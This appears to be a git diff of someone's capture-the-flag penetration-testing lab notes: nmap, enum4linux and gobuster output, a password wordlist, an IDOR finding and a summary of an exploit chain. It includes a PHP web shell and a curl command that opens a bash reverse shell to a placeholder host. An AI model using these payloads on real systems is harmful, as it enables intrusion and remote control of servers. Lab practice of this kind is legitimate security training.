||||||
|
[I] [0m[36mFound new SID:
|
||||||
|
[0mS-1-5-32
|
||||||
|
[33m
|
||||||
|
[I] [0m[36mFound new SID:
|
||||||
|
[0mS-1-5-32
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mEnumerating users using SID S-1-5-32 and logon username '', password ''
|
||||||
|
|
||||||
|
[0mS-1-5-32-544 BUILTIN\Administrators (Local Group)
|
||||||
|
S-1-5-32-545 BUILTIN\Users (Local Group)
|
||||||
|
S-1-5-32-546 BUILTIN\Guests (Local Group)
|
||||||
|
S-1-5-32-547 BUILTIN\Power Users (Local Group)
|
||||||
|
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
|
||||||
|
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
|
||||||
|
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mEnumerating users using SID S-1-5-21-4177045482-676087334-2392555964 and logon username '', password ''
|
||||||
|
|
||||||
|
[0mS-1-5-21-4177045482-676087334-2392555964-501 IP-10-81-148-220\nobody (Local User)
|
||||||
|
S-1-5-21-4177045482-676087334-2392555964-513 IP-10-81-148-220\None (Domain Group)
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mEnumerating users using SID S-1-22-1 and logon username '', password ''
|
||||||
|
|
||||||
|
[0mS-1-22-1-1000 Unix User\sys-internal (Local User)
|
||||||
|
S-1-22-1-1001 Unix User\ssm-user (Local User)
|
||||||
|
S-1-22-1-1002 Unix User\ubuntu (Local User)
|
||||||
|
|
||||||
|
[34m ===============================( [0m[32mGetting printer info for 10.81.148.220[0m[34m )===============================
|
||||||
|
|
||||||
|
[0mNo printers returned.
|
||||||
|
|
||||||
|
|
||||||
|
enum4linux complete on Fri May 8 16:37:34 2026
|
||||||
|
|
||||||
@@ -0,0 +1,11 @@
|
|||||||
|
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
|
||||||
|
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
|
||||||
|
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
|
||||||
|
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
|
||||||
|
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
|
||||||
|
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
|
||||||
|
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
|
||||||
|
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
|
||||||
|
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
|
||||||
|
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
|
||||||
|
<]>+. <+++[ ->--- <]>-- ---.- ----. <
|
||||||
Binary file not shown.
|
After Width: | Height: | Size: 464 KiB |
@@ -0,0 +1,7 @@
|
|||||||
|
1 new message
|
||||||
|
Message from Root to Gwendoline:
|
||||||
|
|
||||||
|
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
|
||||||
|
|
||||||
|
END MESSAGE
|
||||||
|
|
||||||
@@ -0,0 +1,80 @@
|
|||||||
|
A56IpIl%1s02u
|
||||||
|
vTFbDzX9&Nmu?
|
||||||
|
FfF~sfu^UQZmT
|
||||||
|
8FF?iKO27b~V0
|
||||||
|
ua4W~2-@y7dE$
|
||||||
|
3j39aMQQ7xFXT
|
||||||
|
Wb4--CTc4ww*-
|
||||||
|
u6oY9?nHv84D&
|
||||||
|
0iBp4W69Gr_Yf
|
||||||
|
TS*%miyPsGV54
|
||||||
|
C77O3FIy0c0sd
|
||||||
|
O14xEhgg0Hxz1
|
||||||
|
5dpv#Pr$wqH7F
|
||||||
|
1G8Ucoce1+gS5
|
||||||
|
0plnI%f0~Jw71
|
||||||
|
0kLoLzfhqq8u&
|
||||||
|
kS9pn5yiFGj6d
|
||||||
|
zeff4#!b5Ib_n
|
||||||
|
rNT4E4SHDGBkl
|
||||||
|
KKH5zy23+S0@B
|
||||||
|
3r6PHtM4NzJjE
|
||||||
|
gm0!!EC1A0I2?
|
||||||
|
HPHr!j00RaDEi
|
||||||
|
7N+J9BYSp4uaY
|
||||||
|
PYKt-ebvtmWoC
|
||||||
|
3TN%cD_E6zm*s
|
||||||
|
eo?@c!ly3&=0Z
|
||||||
|
nR8&FXz$ZPelN
|
||||||
|
eE4Mu53UkKHx#
|
||||||
|
86?004F9!o49d
|
||||||
|
SNGY0JjA5@0EE
|
||||||
|
trm64++JZ7R6E
|
||||||
|
3zJuGL~8KmiK^
|
||||||
|
CR-ItthsH%9du
|
||||||
|
yP9kft386bB8G
|
||||||
|
A-*eE3L@!4W5o
|
||||||
|
GoM^$82l&GA5D
|
||||||
|
1t$4$g$I+V_BH
|
||||||
|
0XxpTd90Vt8OL
|
||||||
|
j0CN?Z#8Bp69_
|
||||||
|
G#h~9@5E5QA5l
|
||||||
|
DRWNM7auXF7@j
|
||||||
|
Fw!if_=kk7Oqz
|
||||||
|
92d5r$uyw!vaE
|
||||||
|
c-AA7a2u!W2*?
|
||||||
|
zy8z3kBi#2e36
|
||||||
|
J5%2Hn+7I6QLt
|
||||||
|
gL$2fmgnq8vI*
|
||||||
|
Etb?i?Kj4R=QM
|
||||||
|
7CabD7kwY7=ri
|
||||||
|
4uaIRX~-cY6K4
|
||||||
|
kY1oxscv4EB2d
|
||||||
|
k32?3^x1ex7#o
|
||||||
|
ep4IPQ_=ku@V8
|
||||||
|
tQxFJ909rd1y2
|
||||||
|
5L6kpPR5E2Msn
|
||||||
|
65NX66Wv~oFP2
|
||||||
|
LRAQ@zcBphn!1
|
||||||
|
V4bt3*58Z32Xe
|
||||||
|
ki^t!+uqB?DyI
|
||||||
|
5iez1wGXKfPKQ
|
||||||
|
nJ90XzX&AnF5v
|
||||||
|
7EiMd5!r%=18c
|
||||||
|
wYyx6Eq-T^9#@
|
||||||
|
yT2o$2exo~UdW
|
||||||
|
ZuI-8!JyI6iRS
|
||||||
|
PTKM6RsLWZ1&^
|
||||||
|
3O$oC~%XUlRO@
|
||||||
|
KW3fjzWpUGHSW
|
||||||
|
nTzl5f=9eS&*W
|
||||||
|
WS9x0ZF=x1%8z
|
||||||
|
Sr4*E4NT5fOhS
|
||||||
|
hLR3xQV*gHYuC
|
||||||
|
4P3QgF5kflszS
|
||||||
|
NIZ2D%d58*v@R
|
||||||
|
0rJ7p%6Axm05K
|
||||||
|
94rU30Zx45z5c
|
||||||
|
Vi^Qf+u%0*q_S
|
||||||
|
1Fvdp&bNl3#&l
|
||||||
|
zLH%Ot0Bw&c%9
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
assets [36m (Status: 301)[0m [Size: 315][34m [--> http://10.82.186.203/assets/][0m
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
MniVCQVhQHUNI
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
10.82.186.203
|
||||||
@@ -0,0 +1,40 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 08:53:11 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.186.203
|
||||||
|
Nmap scan report for 10.82.186.203
|
||||||
|
Host is up (0.15s latency).
|
||||||
|
Not shown: 65532 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.2
|
||||||
|
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|
||||||
|
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|
||||||
|
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|
||||||
|
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.10 ((Debian))
|
||||||
|
|_http-title: Apache2 Debian Default Page: It works
|
||||||
|
|_http-server-header: Apache/2.4.10 (Debian)
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=5/8%OT=21%CT=1%CU=35695%PV=Y%DS=3%DC=T%G=Y%TM=69FD8BC3
|
||||||
|
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=
|
||||||
|
OS:8)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10A%
|
||||||
|
OS:TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=
|
||||||
|
OS:M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7
|
||||||
|
OS:%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y
|
||||||
|
OS:%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
|
||||||
|
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D
|
||||||
|
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
|
||||||
|
OS:=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40
|
||||||
|
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 554/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 102.75 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 241.60 ms 10.82.186.203
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 09:07:47 2026 -- 1 IP address (1 host up) scanned in 876.16 seconds
|
||||||
@@ -0,0 +1,22 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 09:06:28 2026 as: /usr/lib/nmap/nmap --privileged -p80 -sV --script http-headers -oN nmap_scan_02.txt 10.82.186.203
|
||||||
|
Nmap scan report for 10.82.186.203
|
||||||
|
Host is up (0.052s latency).
|
||||||
|
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
80/tcp open http Apache httpd 2.4.10 ((Debian))
|
||||||
|
| http-headers:
|
||||||
|
| Date: Fri, 08 May 2026 07:06:35 GMT
|
||||||
|
| Server: Apache/2.4.10 (Debian)
|
||||||
|
| Last-Modified: Thu, 23 Jan 2020 00:34:26 GMT
|
||||||
|
| ETag: "1ead-59cc3cda1f3a4"
|
||||||
|
| Accept-Ranges: bytes
|
||||||
|
| Content-Length: 7853
|
||||||
|
| Vary: Accept-Encoding
|
||||||
|
| Connection: close
|
||||||
|
| Content-Type: text/html
|
||||||
|
|
|
||||||
|
|_ (Request type: HEAD)
|
||||||
|
|_http-server-header: Apache/2.4.10 (Debian)
|
||||||
|
|
||||||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 09:06:36 2026 -- 1 IP address (1 host up) scanned in 8.12 seconds
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
Exploitation Steps:
|
||||||
|
|
||||||
|
1. Obtain a low-privileged shell on the target system, via UnrealIRCD exploit.
|
||||||
|
2. Read the contents of /etc/password.txt using cat /etc/password.txt.
|
||||||
|
3. Use the discovered root password to escalate privileges via ssh root@IP.
|
||||||
@@ -0,0 +1,25 @@
|
|||||||
|
# Nmap 7.99 scan initiated Sun May 31 10:43:02 2026 as: /usr/lib/nmap/nmap --privileged -sV -sC -p- -oN nmap_scan01.txt 10.80.133.13
|
||||||
|
Nmap scan report for 10.80.133.13
|
||||||
|
Host is up (0.057s latency).
|
||||||
|
Not shown: 65533 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 256 b1:3e:c2:56:97:97:4b:c7:2e:dd:a7:49:d3:ee:90:08 (ECDSA)
|
||||||
|
|_ 256 74:6c:01:a3:6c:6d:7b:17:09:f6:38:d0:11:ad:0f:4c (ED25519)
|
||||||
|
6667/tcp open irc UnrealIRCd
|
||||||
|
| irc-info:
|
||||||
|
| users: 1
|
||||||
|
| servers: 1
|
||||||
|
| lusers: 1
|
||||||
|
| lservers: 0
|
||||||
|
| server: irc.pentest-target.thm
|
||||||
|
| version: Unreal3.2.8.1. irc.pentest-target.thm
|
||||||
|
| uptime: 0 days, 0:05:14
|
||||||
|
| source ident: nmap
|
||||||
|
| source host: ip-192-168-138-181.eu-west-1.compute.internal
|
||||||
|
|_ error: Closing Link: jkzwzulpy[ip-192-168-138-181.eu-west-1.compute.internal] (Quit: jkzwzulpy)
|
||||||
|
Service Info: Host: irc.pentest-target.thm; OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Sun May 31 10:46:16 2026 -- 1 IP address (1 host up) scanned in 194.45 seconds
|
||||||
@@ -0,0 +1,7 @@
|
|||||||
|
Original URL after Login
|
||||||
|
|
||||||
|
http://10.80.158.146/profile.php?id=6
|
||||||
|
|
||||||
|
IDOR vulnerable
|
||||||
|
|
||||||
|
http://10.80.158.146/profile.php?id=1
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
s.mitchell@recruitx.thm
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
1. Enumeration: We discovered the application's technology stack (Apache, PHP, MySQL), its directory structure, an API endpoint, a password reset page, an uploads directory, and an admin panel.
|
||||||
|
2. IDOR (Task 3): The /profile.php?id= parameter and the /api/user?id= endpoint allowed us to enumerate all users, including the administrator's name and email address.
|
||||||
|
3. Weak Password Reset (Task 4): The reset mechanism displayed tokens directly in the HTTP response, allowing us to generate a token for the administrator and change her password.
|
||||||
|
4. Admin Panel Access (Task 5): Using the compromised administrator account, we accessed the admin panel and found a file upload function with an incomplete extension blocklist.
|
||||||
|
5. Remote Code Execution (Task 6): We uploaded a PHP web shell using the .phtml extension, which bypassed the filter. This gave us command execution on the server and a path to a full reverse shell.
|
||||||
@@ -0,0 +1,15 @@
|
|||||||
|
index.php [32m (Status: 200)[0m [Size: 21600]
|
||||||
|
login.php [32m (Status: 200)[0m [Size: 15107]
|
||||||
|
register.php [32m (Status: 200)[0m [Size: 14802]
|
||||||
|
profile.php [36m (Status: 302)[0m [Size: 0][34m [--> /login.php][0m
|
||||||
|
jobs.php [32m (Status: 200)[0m [Size: 27698]
|
||||||
|
uploads [36m (Status: 301)[0m [Size: 316][34m [--> http://10.80.158.146/uploads/][0m
|
||||||
|
data [33m (Status: 403)[0m [Size: 278]
|
||||||
|
admin [36m (Status: 301)[0m [Size: 314][34m [--> http://10.80.158.146/admin/][0m
|
||||||
|
test [32m (Status: 200)[0m [Size: 705]
|
||||||
|
includes [36m (Status: 301)[0m [Size: 317][34m [--> http://10.80.158.146/includes/][0m
|
||||||
|
api [36m (Status: 301)[0m [Size: 312][34m [--> http://10.80.158.146/api/][0m
|
||||||
|
logout.php [36m (Status: 302)[0m [Size: 0][34m [--> /login.php][0m
|
||||||
|
config [36m (Status: 301)[0m [Size: 315][34m [--> http://10.80.158.146/config/][0m
|
||||||
|
dashboard.php [36m (Status: 302)[0m [Size: 0][34m [--> /login.php][0m
|
||||||
|
reset.php [32m (Status: 200)[0m [Size: 14408]
|
||||||
@@ -0,0 +1,25 @@
|
|||||||
|
# Nmap 7.99 scan initiated Sat May 30 21:03:47 2026 as: /usr/lib/nmap/nmap --privileged -sV -sC -p- -oN nmap_scan01.txt 10.80.158.146
|
||||||
|
Nmap scan report for 10.80.158.146
|
||||||
|
Host is up (0.049s latency).
|
||||||
|
Not shown: 65531 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 256 cb:60:76:ef:27:b1:ba:4a:7d:ed:b0:78:ae:ad:21:46 (ECDSA)
|
||||||
|
|_ 256 4e:c2:ef:35:5f:b0:e4:02:0e:30:a2:3f:e7:e2:6a:80 (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|
||||||
|
|_http-title: RecruitX - Home
|
||||||
|
|_http-server-header: Apache/2.4.58 (Ubuntu)
|
||||||
|
| http-cookie-flags:
|
||||||
|
| /:
|
||||||
|
| PHPSESSID:
|
||||||
|
|_ httponly flag not set
|
||||||
|
3306/tcp open mysql MySQL (unauthorized)
|
||||||
|
8080/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.58 (Ubuntu)
|
||||||
|
|_http-open-proxy: Proxy might be redirecting requests
|
||||||
|
|_http-title: Apache2 Ubuntu Default Page: It works
|
||||||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Sat May 30 21:07:33 2026 -- 1 IP address (1 host up) scanned in 226.96 seconds
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
curl "http://10.80.158.146/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/CONNECTION_IP/4444+0>%261'"
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
<?php
|
||||||
|
if(isset($_GET['cmd'])) {
|
||||||
|
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
<?php echo "PHP is executing"; ?>
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
<?php echo "PHP is executing"; ?>
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
Hello World
|
||||||
Reference in New Issue
Block a user